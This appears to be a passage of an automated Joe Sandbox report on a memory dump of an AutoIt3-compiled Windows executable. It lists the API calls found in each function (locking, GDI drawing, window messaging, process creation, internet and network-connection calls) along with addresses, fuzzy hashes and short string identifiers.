                                                                                                                                                          • Instruction ID: c39be63b86aa4a6f2daa071b8bc7c3521ff0d4a71f233572fbfd18491385114f
                                                                                                                                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                          • Instruction Fuzzy Hash: E9017B3200064EFBCF125E84DC61CEE3F67BB18392B588914FE2859031C332CAB5AB81
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0014869D: __getptd_noexit.LIBCMT ref: 0014869E
                                                                                                                                                          • __lock.LIBCMT ref: 0014811F
                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0014813C
                                                                                                                                                          • _free.LIBCMT ref: 0014814F
                                                                                                                                                          • InterlockedIncrement.KERNEL32(0173E450), ref: 00148167
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2704283638-0
                                                                                                                                                          • Opcode ID: fcea58f799157f40652dd394a7f95722c1802fdbccf02fb036d199a42e4bd5d9
                                                                                                                                                          • Instruction ID: 053531625872756a687c67ec8d4172027550695b99f0542c26e44f523aa8b339
                                                                                                                                                          • Opcode Fuzzy Hash: fcea58f799157f40652dd394a7f95722c1802fdbccf02fb036d199a42e4bd5d9
                                                                                                                                                          • Instruction Fuzzy Hash: 95018C31902A21AFCB12AF65980A79DB760BF05B15F49011BF81567BB1CF346882CBD2
                                                                                                                                                          APIs
                                                                                                                                                          • __lock.LIBCMT ref: 00148768
                                                                                                                                                            • Part of subcall function 00148984: __mtinitlocknum.LIBCMT ref: 00148996
                                                                                                                                                            • Part of subcall function 00148984: RtlEnterCriticalSection.NTDLL(00140127), ref: 001489AF
                                                                                                                                                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 00148775
                                                                                                                                                          • __lock.LIBCMT ref: 00148789
                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 001487A7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1687444384-0
                                                                                                                                                          • Opcode ID: d54423af19e8254411b61643f10ca3ab3217b1a8be177963a3e19427011dc874
                                                                                                                                                          • Instruction ID: c9ec2bbfe1c600127e86b41c467afdea1d77ef5686c547e77446a922267f3a5f
                                                                                                                                                          • Opcode Fuzzy Hash: d54423af19e8254411b61643f10ca3ab3217b1a8be177963a3e19427011dc874
                                                                                                                                                          • Instruction Fuzzy Hash: 75015775411B00DFE760EFA5D90A75AB7E0AF60326F20890EE09A976A0CB70A680CB01
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0018E14D
                                                                                                                                                          • _memset.LIBCMT ref: 0018E15C
                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E3EE0,001E3F24), ref: 0018E18B
                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0018E19D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3277943733-0
                                                                                                                                                          • Opcode ID: b469c8112d5fe734c69d5d8cf1bc83e824abc69e5904364f6738ad15dca55080
                                                                                                                                                          • Instruction ID: a4d3a9db17b93b9d4752d0eaefa52c56c5e8e6944ffd86360f36dcb291defc53
                                                                                                                                                          • Opcode Fuzzy Hash: b469c8112d5fe734c69d5d8cf1bc83e824abc69e5904364f6738ad15dca55080
                                                                                                                                                          • Instruction Fuzzy Hash: E9F054F1940340BEE61057A6AC49F7B7AACDB0A754F000461FA14DA5A2D3B64E9086B5
                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00169C7F
                                                                                                                                                            • Part of subcall function 0016AD14: _memset.LIBCMT ref: 0016AD49
                                                                                                                                                          • _memmove.LIBCMT ref: 00169CA2
                                                                                                                                                          • _memset.LIBCMT ref: 00169CAF
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00169CBF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 48991266-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013B5EB
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B5FA
                                                                                                                                                            • Part of subcall function 0013B58B: BeginPath.GDI32(?), ref: 0013B611
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B63B
                                                                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018E860
                                                                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 0018E86D
                                                                                                                                                          • EndPath.GDI32(00000000), ref: 0018E87D
                                                                                                                                                          • StrokePath.GDI32(00000000), ref: 0018E88B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015D640
                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0015D653
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0015D65A
                                                                                                                                                          • AttachThreadInput.USER32(00000000), ref: 0015D661
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 0013B0C5
                                                                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 0013B0CF
                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0013B0E4
                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 0013B0EC
                                                                                                                                                          • GetWindowDC.USER32(?,00000000), ref: 0019ECFA
                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0019ED07
                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0019ED20
                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0019ED39
                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0019ED59
                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0019ED64
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1946975507-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                          • Opcode ID: 5d7ac88238ae4dbf3e2f2dc67da305f66b99b28fe8ce569699bf6a9dc3a2fea3
                                                                                                                                                          • Instruction ID: c021add009dae85185e5c534f47a738b784baca84da0cbb59f5007a09e283151
                                                                                                                                                          • Opcode Fuzzy Hash: 5d7ac88238ae4dbf3e2f2dc67da305f66b99b28fe8ce569699bf6a9dc3a2fea3
                                                                                                                                                          • Instruction Fuzzy Hash: 86E046B1900600EFDB006F70EC486A93BE9EB4D360F12C405F94F8BA50DBB899818B00
                                                                                                                                                          APIs
                                                                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0015ECA0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContainedObject
                                                                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                                                                          • API String ID: 3565006973-3941886329
                                                                                                                                                          • Opcode ID: 17f067e1e95352a375a4cb5c490bdb7f25ebb3590a85596bf659961232627cf2
                                                                                                                                                          • Instruction ID: 2ce1816bff48df089acc8dee2827682ea1b7e5cdf0a38984260dcced31b632a0
                                                                                                                                                          • Opcode Fuzzy Hash: 17f067e1e95352a375a4cb5c490bdb7f25ebb3590a85596bf659961232627cf2
                                                                                                                                                          • Instruction Fuzzy Hash: 539168B0A00701DFDB18CF64C884A6ABBF9BF49711B14846EED5ACF291DBB0E944CB50
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • __wcsnicmp.LIBCMT ref: 0016E785
                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0016E84E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                          • String ID: LPT
                                                                                                                                                          • API String ID: 3222508074-1350329615
                                                                                                                                                          • Opcode ID: 7ff72557e26cb718b3e8e676fe434b3665a34dbc93f85a3ea780fd68843d060c
                                                                                                                                                          • Instruction ID: 37724be9b1d1d3400e50ef4343530a695f4eb499bca1cdd5a5cc50d18b8b5c97
                                                                                                                                                          • Opcode Fuzzy Hash: 7ff72557e26cb718b3e8e676fe434b3665a34dbc93f85a3ea780fd68843d060c
                                                                                                                                                          • Instruction Fuzzy Hash: D7617179A00215AFCB14EF98CC95EAEB7F8EF18710F054169F506AB391DB30AE50CB90
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00121B83
                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00121B9C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                          • Opcode ID: 394477cc8302df8d920eafe345c60931f2b8d0ce2ff80ae1b5f75e1e01209ff7
                                                                                                                                                          • Instruction ID: a2ad965a6c0a63dbf54e84d4cb796b2bca711ab072e1d70db7dc8443d7ed6276
                                                                                                                                                          • Opcode Fuzzy Hash: 394477cc8302df8d920eafe345c60931f2b8d0ce2ff80ae1b5f75e1e01209ff7
                                                                                                                                                          • Instruction Fuzzy Hash: 4D512872409744ABE320AF14D885BAFBBECFFA9354F41484DF1C8410A5EB7195ACC762
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012417D: __fread_nolock.LIBCMT ref: 0012419B
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016CF49
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016CF5C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscmp$__fread_nolock
                                                                                                                                                          • String ID: FILE
                                                                                                                                                          • API String ID: 4029003684-3121273764
                                                                                                                                                          • Opcode ID: eb7b23eba2609178b5e5e223659584b628ea3306704342b1ca0b90caa3937722
                                                                                                                                                          • Instruction ID: 6ec49c3ac275f3724b6659f9db110abb4edbc748bd5bebddc2d3c71fa4d5cac9
                                                                                                                                                          • Opcode Fuzzy Hash: eb7b23eba2609178b5e5e223659584b628ea3306704342b1ca0b90caa3937722
                                                                                                                                                          • Instruction Fuzzy Hash: F941E732A00219BBDF20DBA4DC41FEFBBBA9F59710F000469F641E7191D771AA64C790
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0018A668
                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0018A67D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: '
                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 001757E7
                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0017581D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CrackInternet_memset
                                                                                                                                                          • String ID: |
                                                                                                                                                          • API String ID: 1413715105-2343686810
                                                                                                                                                          APIs
                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 0018961B
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00189657
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                          • String ID: static
                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165BE4
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00165C1F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                                                                          APIs
                                                                                                                                                          • __snwprintf.LIBCMT ref: 00176BDD
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __snwprintf_memmove
                                                                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                          • API String ID: 3506404897-2584243854
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00189269
                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00189274
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: Combobox
                                                                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                            • Part of subcall function 0013C619: GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                            • Part of subcall function 0013C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00189775
                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 0018978F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                          • String ID: static
                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 001894A6
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001894B5
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                                                                          • String ID: edit
                                                                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165CF3
                                                                                                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00165D12
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                                                                          APIs
                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0017544C
                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00175475
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                          • String ID: <local>
                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: htonsinet_addr
                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                          • API String ID: 3832099526-2422070025
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0015C5E5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 1456604079-1403004172
                                                                                                                                                          • Opcode ID: 420e50a2c39ac493304ff8f6126e37c37739ef10007105d8bbaddee5c8db9530
                                                                                                                                                          • Instruction ID: 4fa0ddcf8b304a0b6d07d44bd7fd1be018d4d6ed04076de0db6977bc737624b0
                                                                                                                                                          • Opcode Fuzzy Hash: 420e50a2c39ac493304ff8f6126e37c37739ef10007105d8bbaddee5c8db9530
                                                                                                                                                          • Instruction Fuzzy Hash: F201B571611229AFCB08EFA4CC51CFE73AAAB523117140619F833AB2D1EB70691C9790
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                                                                          • String ID: EA06
                                                                                                                                                          • API String ID: 1988441806-3962188686
                                                                                                                                                          • Opcode ID: bf2d19974734f45195ad0319377a4c8e9ee5437d74901657bc96a7b56d06d430
                                                                                                                                                          • Instruction ID: 8d8af4d0118040a0b51b7b2163e341528cd6927c41c1f1f809660b78aece072f
                                                                                                                                                          • Opcode Fuzzy Hash: bf2d19974734f45195ad0319377a4c8e9ee5437d74901657bc96a7b56d06d430
                                                                                                                                                          • Instruction Fuzzy Hash: 5C01B5729042586EEF28DBA8CC56FBE7BF89B15711F00415AE197D6181E6B4A708CB60
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0015C4E1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 1456604079-1403004172
                                                                                                                                                          • Opcode ID: b036e41440a130db25cda8716580dade0563ef4d093ee47b1591a9b2cced90e8
                                                                                                                                                          • Instruction ID: ed4a79a0fb5789fecf51e30f7676332631820a4cb45c8168e5a70f27da402c2f
                                                                                                                                                          • Opcode Fuzzy Hash: b036e41440a130db25cda8716580dade0563ef4d093ee47b1591a9b2cced90e8
                                                                                                                                                          • Instruction Fuzzy Hash: 9B018F71A41218AFCB08EBA4C962EFF73AD9B25301F140025F923E72C1EB645E1C96A1
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 0015C562
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 1456604079-1403004172
                                                                                                                                                          • Opcode ID: 7b61d5892b4d74e15f3b01072ee28c81d7764073bf468ed76bf7afa985a11fcc
                                                                                                                                                          • Instruction ID: df0b2409f04513e2bfb413484a1c41be51b8296248ce13563285daf6827df838
                                                                                                                                                          • Opcode Fuzzy Hash: 7b61d5892b4d74e15f3b01072ee28c81d7764073bf468ed76bf7afa985a11fcc
                                                                                                                                                          • Instruction Fuzzy Hash: 3801F271B01218ABCB08EBA4D942EFF33AD9B21702F140025F913E72C1EB209F1C96A1
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassName_wcscmp
                                                                                                                                                          • String ID: #32770
                                                                                                                                                          • API String ID: 2292705959-463685578
                                                                                                                                                          • Opcode ID: cc019d5262a3084bb1502245ff3de6a615d2e40ac49d7e09abe8152d58537697
                                                                                                                                                          • Instruction ID: 65c036cc584af97513f5d0fc5d23da1b53875d740da63054772a110d1dd87f72
